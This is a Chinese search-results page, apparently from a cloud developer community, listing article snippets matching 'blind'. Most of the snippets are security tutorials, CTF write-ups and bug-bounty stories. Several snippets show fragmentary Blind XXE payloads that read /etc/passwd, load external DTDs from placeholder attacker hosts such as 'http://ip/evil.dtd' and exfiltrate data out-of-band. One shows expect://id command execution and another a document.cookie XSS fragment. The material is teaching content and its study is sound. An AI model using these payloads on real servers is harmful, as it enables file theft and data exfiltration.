展开

关键词

“盲”逆向:iOS 应用 Blind 寻踪

原文地址:《"BLIND" Reversing - A Look At The Blind iOS App》 译者:hello1900@知道创宇404实验室 发表时间:2017年11月7日 前言 “ Blind是一款用于工作场合的匿名社区应用。” 能否看到应用发送至服务器的明文数据? 提取类 为了回答这些问题,首先转储类,看看是否存在有价值的内容。 center>具有加密秘钥的明文数据 此外,连接EncriptControl 类convertDictionaryEncWithResultStr: 方法后打印出服务器响应明文 如前文所述,我没有注册Blind 账户,因此无法使用会员功能。但这些都无妨,我只对Burp上的一些数据感兴趣。考虑到应用程序性质与要求,我打算探索更多内容。因此,并无恶意流量发送至Blind服务器

59570

“盲”逆向:iOS 应用 Blind 寻踪

Blind是一款用于工作场合的匿名社区应用。” 能否看到应用发送至服务器的明文数据? 07 提 取 类 为了回答这些问题,首先转储类,看看是否存在有价值的内容。 具有加密秘钥的明文数据 此外,连接EncriptControl 类convertDictionaryEncWithResultStr: 方法后打印出服务器响应明文。 如前文所述,我没有注册Blind 账户,因此无法使用会员功能。但这些都无妨,我只对Burp上的一些数据感兴趣。考虑到应用程序性质与要求,我打算探索更多内容。因此,并无恶意流量发送至Blind服务器。 本文可用于围绕Blind应用开展进一步调研。对于提供信息的采用,本博客不承担任何责任。

668140
  • 广告
    关闭

    腾讯云精选爆品盛惠抢购

    腾讯云精选爆款云服务器限时体验20元起,还有更多热门云产品满足您的上云需求

  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    渗透测试|利用Blind XXE Getshell(Java网站)

    目录 Blind XXE读取任意文件Getshell 这是一道类似CTF的题目。话不多说 访问链接,如下。于是随便输入任意数字,点击Create Account 抓包重放,发现是XML提交的格式。 root/> <reg><name>111</name><tel>222</tel><email>333</email></reg> 现在已经证明了该网站存在XXE漏洞,但是由于无回显,所以我们只能利用Blind Blind XXE读取任意文件Getshell 首先,在我们的VPS上建立一个xml.dtd文件,内容如下。然后建立起一个HTTP服务,访问路径为:http://vps的IP/xml.dtd <! 然后成功连上目标主机 注: 这里通过监听2121端口的流量读取的数据,是从 RETR 开始后面的这些 相关文章:记一次利用BLIND OOB XXE漏洞获取文件系统访问权限的测试 来源:谢公子的博客

    11600

    Blind XXE详解与Google CTF一道题分析

    现在来看有回显的XXE已经很少了,Blind XXE重点在于如何将数据传输出来。 以往很多文章通过引入外部服务器或者本地dtd文件,可以实现OOB(out-of-band)信息传递和通过构造dtd从错误信息获取数据。 ENTITY % files SYSTEM "file:///etc/passwd">'>]><message>&normal;</message> Blind XXE OOB 引入服务器DTD 通过引入服务器文件 xml.dtd <!ENTITY % start "<! Blind XXE部分。

    93230

    记我的一次账号劫持和BLIND XSS漏洞发现过程

    document.cookie)%3E IDOR:不安全的直接对象引用允许攻击者绕过网站的身份验证机制,并通过修改指向对象链接中的参数值来直接访问目标对象资源,这类资源可以是属于其他用户的数据库条目以及服务器系统中的隐私文件等等 第二个漏洞 - BLIND XSS 由于目标测试网站开通有付费版的专业高级功能模块,所以我决定付钱来购买进行测试。这个购买付费方式有两种,也即信用卡和银行转账。 之后,我就在其中插入了一个利用 XSSHunter 生成的 BLIND XSS Payload,一切就静等上钩吧。 几天之后,我无意间浏览了我的XSSHunter账户,出乎意料地发现,那段插入的BLIND XSS Payload竟然在目标测试网站的控制面板管理区域被成功触发了!

    47900

    CVE-2021-22911:Pre-Auth Blind NoSQL 注入导致 Rocket Chat 3.12.1 RCE

    预认证盲 NoSQL 注入导致 Rocket Chat 3.12.1 中的远程代码执行

    90530

    斯坦福教授发布首份 AI Index 报告,指引 AI 工作者不再“flying blind

    没有相关合理的数据来呈现 AI 技术的现状,那么我们去开会或者做一些 AI 相关的决策其实就像是在「flying blind」。 而现在,我们真的在「flying blind」! 2000 万辆自行车提交它们的 GPS 数据和其他传感器信息到服务器上,每天创造了 20TB 的数据。同样的,据报道,中国的汽车共享公司 DiDi 将其数据与一些试点城市的交通管制联系起来。

    28860

    记一次利用BLIND OOB XXE漏洞获取文件系统访问权限的测试

    这一次,响应内容又是空的,和未指定任何内容类型的简单POST请求响应一样,由此,我推断该服务端能正常处理XML数据,这样一来,我想尝试利用BLIND XXE攻击方式来触发其漏洞。

    52850

    XXE注入高端操作攻击payload汇总【补】

    2、SSRF—探测端口: 适用于有回显和blind xxe,也是外部一般实体: <?xml version="1.0"?> <!DOCTYPE ANY [ <! 3、Blind xxe 控制web服务器任意发包: ? <?xml version="1.0"?> <!DOCTYPE ANY [ <! ENTITYcontent SYSTEM " http://<oursite>/hhhhhhh">]> <name>&content;</name> 这样可以控制服务器向我们自己的服务器发包,上面我们请求了自己的服务器上一个不存在的文件 这里请求web服务器的方法也可以换成请求任意端口,然后在我们的服务器开启nc监听。 4、OOB blind OOB(Out-Of-Band)是个通用的技巧,在其他漏洞场景也有利用。 %file;'>"> %all; 梳理一下数据流向:xml发包,重定向到dtd文件,把结果赋给data——>转入服务器的dtd文件,dtd中首先请求了web服务器的C盘文件,内容赋给file参数——>再请求我们的服务器

    2.7K20

    Web漏洞|XXE漏洞详解(XML外部实体注入)

    利用详情:XXE漏洞利用 03 Blind XXE 如上例所示,服务器将 /etc/passwd 文件的内容作为响应返回给我们的XXE。 但是在大多数情况下,即使服务器可能存在XXE漏洞,服务器也不会向攻击者的浏览器返回任何响应。遇到这种情况,可以实现OOB(out-of-band)信息传递和通过构造dtd从错误信息获取数据。 错误获取数据:通过构造dtd然后从错误中获取数据 通过OOB进行目录浏览和任意文件读取 注:Linux机器可以目录浏览和任意文件读取,Windows机器只能任意文件读取 Blind XXE是由于虽然目标服务器加载了 那么,我们是否可以想其他的办法,将服务器读取的数据传送给我们的VPS呢? 除此之外,我们也可以使用 http URI 并强制服务器向我们指定的端点和端口发送GET请求,将 XXE 转换为SSRF(服务器端请求伪造)。

    9910

    XML外部实体(XXE)注入原理解析及实战案例全汇总

    2)漏洞危害 XXE漏洞根据有无回显可分为有回显XXE和Blind XXE,具体危害主要有: a.)检索文件,其中定义了包含文件内容的外部实体,并在应用程序的响应中返回。 ENTITY xxe SYSTEM "expect://id" >执行命令; c.)无回显读取本地敏感文件(Blind OOB XXE),敏感数据从应用服务器传输到攻击者的服务器上。 d.)通过Blind XXE错误消息检索数据是否存在,攻击者可以触发包含敏感数据的解析错误消息。 具体的攻击手段和场景在案例中说明。 2)文件上传类Blind OOB XXE 这是关于XXE一个重要的测试技巧,在挖掘XXE漏洞过程中要留意接受.docx 、.xlsx和.pptx格式文件的上传,你可以尝试用winrar等解压文件打开一个 在收到请求调用之后,远程服务器会发送回 DTD 文件: ? 对于这个OOB XXE漏洞bp有个插件Collaborator client可以帮助测试: ?

    4.4K30

    渗透测试之XXE漏洞

    ENTITY file SYSTEM "file:///etc/passwd"> ]> <c>&file;</c> 2) Blind XXE 服务器没有回显,只能使用 Blind XXE 来构建一条带外数据通道提取数据 ; Blind XXE 主要使用了 DTD 约束中的参数实体和内部定义实体。 ENTITY b 'http://www.xxx.com'>" %a; ]> <c>&b;</c> Blind XXE 采用嵌套形式建立带外数据通道,利用参数实体将本地内容读出来后 ,作为外部实体中的 URL 中的参数向其指定服务器发起请求,然后在其指定服务器的日志(Apache 日志)中读出文件的内容(指定服务器即攻击者的服务器);DTD 中使用 % 来定义的参数实体只能在外部子集中使用 ENTITY % d SYSTEM "http://ip/evil.dtd" > %d; ]> <root> <name>&b;</name> </root> 远程vps服务器 www/html文件下建立

    52030

    Sqli-labs 大完结

    Less-48 - ORDER BY Clause Blind based 1.3.12. Less49 - ORDER BY Clause Blind based 1.3.13. Less50 - ORDER BY Clause Blind based 1.3.14. Less-51 - ORDER BY Clause Blind based 1.3.15. Less-52 - ORDER BY Clause Blind based 1.3.16. Less-53 - ORDER BY Clause Blind based 1.4. WAF的一个错误 HTTP参数污染(HTTP Parameter Pollution) 攻击者通过在HTTP请求中插入特定的参数来发起攻击,如果Web应用中存在这样的漏洞,可以被攻击者利用来进行客户端或者服务器端的攻击 转自聂哥 http参数污染,见sql注入总结的HTTP参数污染即可, 上面已经说过,waf服务器(tomcat)只解析重复参数里面的前者,而真正的web服务器(Apache)只解析重复参数里面的后者,我们可以传入两个

    18020

    双盲同行评审能减少偏见吗?来自计算机科学顶级会议的证据(cs.cy)

    Here, we examine the effects of double-blind peer review on prestige bias by analyzing the peer review peer review to double-blind peer review in 2018. We find that after switching to double-blind review, the scores given to the most prestigious authors double-blind format, suggesting that double-blind review better identifies poorer quality papers. Does double-blind peer-review reduce bias? Evidence from a top computer science conference.pdf

    28200

    保护版权,用 Python 为图片添加盲水印

    为图片添加盲水印,自然是搜索相关的工具,通常情况下,我会去 GitHub 输入英文关键字进行搜索,搜索结果如下: 选择 star 数量最多的通常错不了,guofei9987/blind_watermark 安装开发版本: git clone git@github.com:guofei9987/blind_watermark.git cd blind_watermark pip install . 该工具用到的其他库: numpy>=1.17.0 opencv-python setuptools PyWavelets 2、添加文本水印与提取 添加文本水印: from blind_watermark 留言讨论 参考资料 [1] 旋转攻击.py: https://github.com/guofei9987/blind_watermark/blob/master/examples/旋转攻击.py [2] guofei9987/blind_watermark/blob/master/examples/缩放攻击.py [6] 椒盐击.py: https://github.com/guofei9987/blind_watermark

    45210

    Web安全Day8 - XXE实战攻防

    1.3.2.3 Blind XXE 当服务器没有回显,我们可以选择使用Blind XXE。 与前两种XXE不同之处在于Blind XXE无回显信息,可组合利用file协议来读取文件或http协议和ftp协议来查看日志。 Blind XXE主要使用了DTD约束中的参数实体和内部实体。 利用过程:第3行,存在漏洞的服务器会读出file的内容(c:/1.txt),通过Quan.xml带外通道发送给攻击者服务器上的1.php,1.php做的事情就是把读取的数据保存到本地的1.txt中,完成 Blind XXE攻击。 ,证明存在Blind XXE。

    78810

    sqlmap的使用介绍

    一、sqlmap获取目标 1.sql注入介绍 所谓SQL注入,就是通过把SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。 - WHERE or HAVING clause (MySQL comment)' [18:05:59] [INFO] testing 'OR boolean-based blind - WHERE 2.sqlmap中设置代理 sqlmap中设置代理的参数: –proxy 设置HTTP代理服务器位置 格式:**–proxy http(s): //ip[端口]** –proxy-cred 设置HTTP 代理服务器认证信息 格式:**–proxy-cred user:pwd** –proxy-file 设置多条代理在文件中 –ignore-proxy 当希望通过忽略系统范围内的HTTP(S)代理服务器设置来针对本地网络的目标部 8.避免错误请求过多而被屏蔽 有时服务器检测到某个客户端错误请求过多会对其进行屏蔽,而Sqlmap的测试往往会产生大量错 误请求,为避免被屏蔽,可以时不时的产生几个正常请求以迷惑服务器

    22820

    XXE漏洞挖掘分享

    (2)检测服务器是否支持外部实体: [html] view plain copy 1. <?xml version=”1.0” encoding=”UTF-8”?> 2. <! %shit; 5. ]> 通过查看自己服务器上的日志来判断,看目标服务器是否向你的服务器发了一条请求evil.xml的HTTP request。 (3)如果上面两步都支持,那么就看能否回显。 当然有时候服务器会不支持一般实体的引用,也就是在DTD之外无法引用实体,如果这样的话,只能使用Blind XXE攻击。 (4)如果不能回显,毫无疑问,使用Blind XXE攻击方法。

    2.2K50

    相关产品

    • 云服务器

      云服务器

      云端获取和启用云服务器,并实时扩展或缩减云计算资源。云服务器 支持按实际使用的资源计费,可以为您节约计算成本。 腾讯云服务器(CVM)为您提供安全可靠的弹性云计算服务。只需几分钟,您就可以在云端获取和启用云服务器,并实时扩展或缩减云计算资源。云服务器 支持按实际使用的资源计费,可以为您节约计算成本。

    相关资讯

    热门标签

    扫码关注云+社区

    领取腾讯云代金券